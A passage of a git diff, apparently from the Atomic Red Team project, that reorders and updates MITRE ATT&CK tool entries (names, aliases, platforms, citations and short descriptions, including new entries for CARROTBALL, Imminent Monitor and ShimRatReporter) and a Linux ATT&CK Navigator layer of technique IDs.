"yty"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -202931,13 +233027,13 @@
],
"modified": "2020-03-30T18:41:33.050Z",
"created": "2019-01-30T17:48:35.006Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"zwShell"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "tool--30489451-5886-4c46-90c9-0dff9adc5252",
@@ -203002,15 +233098,49 @@
],
"modified": "2020-03-20T18:09:11.516Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.2",
- "x_mitre_aliases": [
- "BITSAdmin"
+ "x_mitre_contributors": [
+ "Edward Millington"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Edward Millington"
+ "x_mitre_aliases": [
+ "BITSAdmin"
+ ],
+ "x_mitre_version": "1.2"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0465",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0465"
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)",
+ "name": "CARROTBALL",
+ "id": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4",
+ "type": "tool",
+ "labels": [
+ "tool"
+ ],
+ "modified": "2020-06-10T14:44:23.055Z",
+ "created": "2020-06-02T19:10:29.513Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "CARROTBALL"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -203039,13 +233169,13 @@
],
"modified": "2020-03-30T15:15:36.756Z",
"created": "2017-05-31T21:33:10.197Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Cachedump"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -203055,9 +233185,9 @@
"external_id": "S0154"
},
{
- "source_name": "cobaltstrike manual",
+ "url": "https://cobaltstrike.com/downloads/csmanual38.pdf",
"description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.",
- "url": "https://cobaltstrike.com/downloads/csmanual38.pdf"
+ "source_name": "cobaltstrike manual"
}
],
"object_marking_refs": [
@@ -203071,18 +233201,18 @@
"labels": [
"tool"
],
- "modified": "2020-03-25T15:06:36.710Z",
+ "modified": "2020-06-23T19:49:20.159Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.3",
+ "x_mitre_aliases": [
+ "Cobalt Strike"
],
"x_mitre_contributors": [
"Josh Abraham"
],
- "x_mitre_aliases": [
- "Cobalt Strike"
- ],
- "x_mitre_version": "1.3"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -203128,17 +233258,17 @@
],
"modified": "2020-03-30T02:08:26.536Z",
"created": "2019-03-11T14:13:40.648Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Empire",
"EmPyre",
"PowerShell Empire"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -203171,16 +233301,16 @@
],
"modified": "2020-03-20T18:43:16.989Z",
"created": "2019-02-19T19:17:14.971Z",
- "x_mitre_contributors": [
- "Matthew Demaske, Adaptforward"
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "Expand"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_aliases": [
- "Expand"
- ],
- "x_mitre_version": "1.1"
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward"
+ ]
},
{
"id": "tool--cf23bf4a-e003-4116-bbae-1ea6c558d565",
@@ -203208,16 +233338,16 @@
],
"modified": "2020-03-30T16:25:40.125Z",
"created": "2017-05-31T21:33:00.565Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "FTP",
- "ftp.exe"
- ],
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
- ]
+ ],
+ "x_mitre_aliases": [
+ "FTP",
+ "ftp.exe"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe",
@@ -203245,13 +233375,13 @@
],
"modified": "2020-03-30T16:40:33.738Z",
"created": "2017-05-31T21:33:10.569Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Fgdump"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
@@ -203325,15 +233455,15 @@
],
"modified": "2019-04-24T20:32:54.936Z",
"created": "2017-05-31T21:32:32.011Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows"
+ ],
"x_mitre_aliases": [
"HTRAN",
"HUC Packet Transmit Tool"
],
- "x_mitre_platforms": [
- "Linux",
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5",
@@ -203371,6 +233501,43 @@
"modified": "2018-10-17T00:14:20.652Z",
"created": "2018-04-18T17:59:24.739Z"
},
+ {
+ "external_references": [
+ {
+ "external_id": "S0434",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0434"
+ },
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Imminent Monitor",
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.(Citation: Imminent Unit42 Dec2019)",
+ "id": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "type": "tool",
+ "labels": [
+ "tool"
+ ],
+ "modified": "2020-07-10T13:39:26.417Z",
+ "created": "2020-05-05T18:45:36.358Z",
+ "x_mitre_contributors": [
+ "Jose Luis S\u00e1nchez Martinez"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_aliases": [
+ "Imminent Monitor"
+ ],
+ "x_mitre_version": "1.0"
+ },
{
"external_references": [
{
@@ -203379,9 +233546,9 @@
"url": "https://attack.mitre.org/software/S0357"
},
{
- "description": "SecureAuth. (n.d.). Retrieved January 15, 2019.",
+ "source_name": "Impacket Tools",
"url": "https://www.secureauth.com/labs/open-source-tools/impacket",
- "source_name": "Impacket Tools"
+ "description": "SecureAuth. (n.d.). Retrieved January 15, 2019."
}
],
"object_marking_refs": [
@@ -203395,19 +233562,19 @@
"labels": [
"tool"
],
- "modified": "2020-03-25T15:25:48.749Z",
+ "modified": "2020-03-31T22:20:17.889Z",
"created": "2019-01-31T01:39:56.283Z",
+ "x_mitre_contributors": [
+ "Jacob Wilkin, Trustwave, SpiderLabs"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "Impacket"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ],
- "x_mitre_aliases": [
- "Impacket"
- ],
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Jacob Wilkin, Trustwave, SpiderLabs"
]
},
{
@@ -203482,13 +233649,13 @@
],
"modified": "2020-03-30T16:55:29.911Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Koadic"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -203520,15 +233687,15 @@
],
"modified": "2020-03-25T15:47:20.122Z",
"created": "2019-01-30T16:44:59.887Z",
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "LaZagne"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ],
- "x_mitre_aliases": [
- "LaZagne"
- ],
- "x_mitre_version": "1.1"
+ ]
},
{
"id": "tool--2fab555f-7664-4623-b4e0-1675ae38190b",
@@ -203556,13 +233723,13 @@
],
"modified": "2020-03-30T16:59:48.036Z",
"created": "2017-05-31T21:33:10.962Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Lslsass"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -203590,15 +233757,15 @@
],
"modified": "2020-03-30T17:01:41.302Z",
"created": "2019-10-05T02:34:01.189Z",
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "MailSniper"
+ ],
"x_mitre_platforms": [
"Office 365",
"Windows",
"Azure AD"
- ],
- "x_mitre_aliases": [
- "MailSniper"
- ],
- "x_mitre_version": "1.1"
+ ]
},
{
"id": "tool--5a33468d-844d-4b1f-98c9-0e786c556b27",
@@ -203626,16 +233793,16 @@
],
"modified": "2020-03-30T17:03:42.864Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Vincent Le Toux"
+ "x_mitre_platforms": [
+ "Linux"
],
"x_mitre_aliases": [
"MimiPenguin"
],
- "x_mitre_platforms": [
- "Linux"
- ]
+ "x_mitre_contributors": [
+ "Vincent Le Toux"
+ ],
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -203668,16 +233835,16 @@
],
"modified": "2020-03-30T17:04:12.674Z",
"created": "2017-05-31T21:32:11.544Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.2",
+ "x_mitre_contributors": [
+ "Vincent Le Toux"
],
"x_mitre_aliases": [
"Mimikatz"
],
- "x_mitre_contributors": [
- "Vincent Le Toux"
- ],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "tool--03342581-f790-4f03-ba41-e82e67392e23",
@@ -203710,17 +233877,17 @@
],
"modified": "2020-03-19T13:14:50.240Z",
"created": "2017-05-31T21:32:31.601Z",
- "x_mitre_version": "2.1",
- "x_mitre_aliases": [
- "Net",
- "net.exe"
+ "x_mitre_contributors": [
+ "David Ferguson, CyberSponse"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "David Ferguson, CyberSponse"
- ]
+ "x_mitre_aliases": [
+ "Net",
+ "net.exe"
+ ],
+ "x_mitre_version": "2.1"
},
{
"external_references": [
@@ -203748,13 +233915,13 @@
],
"modified": "2019-04-22T19:06:17.325Z",
"created": "2019-02-14T17:08:55.176Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.0",
"x_mitre_aliases": [
"Nltest"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "tool--a52edc76-328d-4596-85e7-d56ef5a9eb69",
@@ -203855,15 +234022,15 @@
],
"modified": "2020-03-30T02:37:23.626Z",
"created": "2019-04-23T12:31:58.125Z",
+ "x_mitre_version": "1.2",
+ "x_mitre_aliases": [
+ "PoshC2"
+ ],
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS"
- ],
- "x_mitre_aliases": [
- "PoshC2"
- ],
- "x_mitre_version": "1.2"
+ ]
},
{
"id": "tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d",
@@ -203901,13 +234068,13 @@
],
"modified": "2020-03-28T21:37:30.172Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"PowerSploit"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
@@ -203940,15 +234107,22 @@
],
"modified": "2020-03-20T19:20:27.565Z",
"created": "2017-05-31T21:32:21.771Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"PsExec"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "id": "tool--cb69b20d-56d0-41ab-8440-4a4b251614d4",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Pupy",
+ "description": "[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -203961,18 +234135,11 @@
"url": "https://github.com/n1nj4sec/pupy"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "description": "[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)",
- "name": "Pupy",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "tool--cb69b20d-56d0-41ab-8440-4a4b251614d4",
"type": "tool",
"labels": [
"tool"
],
- "modified": "2020-03-30T17:24:25.192Z",
+ "modified": "2020-05-13T22:57:00.921Z",
"created": "2018-04-18T17:59:24.739Z",
"x_mitre_platforms": [
"Linux",
@@ -204029,14 +234196,14 @@
],
"modified": "2020-03-28T21:39:15.210Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"QuasarRAT",
"xRAT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -204069,13 +234236,13 @@
],
"modified": "2019-04-19T19:04:55.892Z",
"created": "2019-03-25T12:30:40.919Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.0",
"x_mitre_aliases": [
"RawDisk"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
@@ -204157,13 +234324,13 @@
],
"modified": "2020-03-30T18:03:42.421Z",
"created": "2019-01-29T18:55:20.245Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Remcos"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719",
@@ -204214,29 +234381,30 @@
"url": "https://attack.mitre.org/software/S0358"
},
{
- "description": "SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019.",
+ "source_name": "SensePost Ruler GitHub",
"url": "https://github.com/sensepost/ruler",
- "source_name": "SensePost Ruler GitHub"
+ "description": "SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019."
},
{
- "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.",
+ "source_name": "SensePost NotRuler",
"url": "https://github.com/sensepost/notruler",
- "source_name": "SensePost NotRuler"
+ "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019."
}
],
"type": "tool",
"labels": [
"tool"
],
- "modified": "2020-03-30T18:07:20.622Z",
+ "modified": "2020-06-22T21:31:54.771Z",
"created": "2019-02-04T18:27:00.501Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ],
"x_mitre_aliases": [
"Ruler"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153",
@@ -204268,10 +234436,44 @@
],
"modified": "2019-04-24T00:37:08.653Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SDelete"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0445",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0445"
+ },
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary's targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)",
+ "name": "ShimRatReporter",
+ "id": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "type": "tool",
+ "labels": [
+ "tool"
+ ],
+ "modified": "2020-05-27T22:39:28.701Z",
+ "created": "2020-05-12T21:29:48.294Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "ShimRatReporter"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -204373,17 +234575,17 @@
"labels": [
"tool"
],
- "modified": "2020-03-30T18:22:15.391Z",
+ "modified": "2020-05-13T22:59:15.727Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Tor"
- ],
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Tor"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "tool--102c3898-85e0-43ee-ae28-62a0a3ed9507",
@@ -204445,14 +234647,14 @@
],
"modified": "2020-03-30T18:28:34.296Z",
"created": "2017-05-31T21:32:12.684Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Windows Credential Editor",
"WCE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--96fd6cc4-a693-4118-83ec-619e5352d07d",
@@ -204523,16 +234725,16 @@
],
"modified": "2020-03-30T18:34:22.227Z",
"created": "2017-05-31T21:33:06.824Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "at",
- "at.exe"
- ],
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
- ]
+ ],
+ "x_mitre_aliases": [
+ "at",
+ "at.exe"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "tool--0a68f1f1-da74-4d28-8d9a-696c082706cc",
@@ -204560,14 +234762,14 @@
],
"modified": "2019-07-31T19:57:28.859Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"certutil",
"certutil.exe"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--bba595da-b73a-4354-aa6c-224d4de7cb4e",
@@ -204610,14 +234812,14 @@
],
"modified": "2020-03-20T18:38:23.242Z",
"created": "2017-05-31T21:33:05.319Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"cmd",
"cmd.exe"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--38952eac-cb1b-4a71-bad2-ee8223a1c8fe",
@@ -204645,14 +234847,14 @@
],
"modified": "2020-03-18T20:01:55.739Z",
"created": "2017-05-31T21:33:04.937Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"dsquery",
"dsquery.exe"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "tool--c256da91-6dd5-40b2-beeb-ee3b22ab3d27",
@@ -204680,17 +234882,17 @@
],
"modified": "2020-03-20T18:41:43.461Z",
"created": "2019-09-03T18:25:36.963Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "esentutl",
- "esentutl.exe"
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Matthew Demaske, Adaptforward"
- ]
+ "x_mitre_aliases": [
+ "esentutl",
+ "esentutl.exe"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "tool--b07c2c47-fefb-4d7c-a69e-6a3296171f54",
@@ -204718,13 +234920,13 @@
],
"modified": "2020-03-30T18:35:48.851Z",
"created": "2017-05-31T21:32:13.755Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"gsecdump"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5",
@@ -204887,14 +235089,14 @@
],
"modified": "2020-03-31T12:41:22.189Z",
"created": "2017-05-31T21:33:06.083Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"netsh",
"netsh.exe"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--4664b683-f578-434f-919b-1c1aad2a1111",
@@ -204959,13 +235161,13 @@
],
"modified": "2020-03-30T18:40:16.684Z",
"created": "2017-05-31T21:32:13.051Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"pwdump"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--c11ac61d-50f4-444f-85d8-6f006067f0de",
@@ -205030,14 +235232,14 @@
],
"modified": "2020-03-31T12:42:36.620Z",
"created": "2017-05-31T21:33:07.218Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"schtasks",
"schtasks.exe"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--33b9e38f-103c-412d-bdcf-904a91fff1e4",
@@ -205069,13 +235271,13 @@
],
"modified": "2020-03-30T18:40:56.558Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"spwebmember"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555",
@@ -205417,7 +235619,7 @@
"x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462",
"x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8"
],
- "modified": "2020-03-27T18:45:53.032Z",
+ "modified": "2020-07-02T14:18:03.651Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index e6aa41ec..7b2c7acc 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","sc
ore":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1551.002","score":100,"enabled":true},{"techniqueID":"T1551.003","score":100,"enabled":true},{"techniqueID":"T1551.004","score":100,"enabled":true},{"techniqueID":"T1551.006","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true}]}
\ No newline at end of file
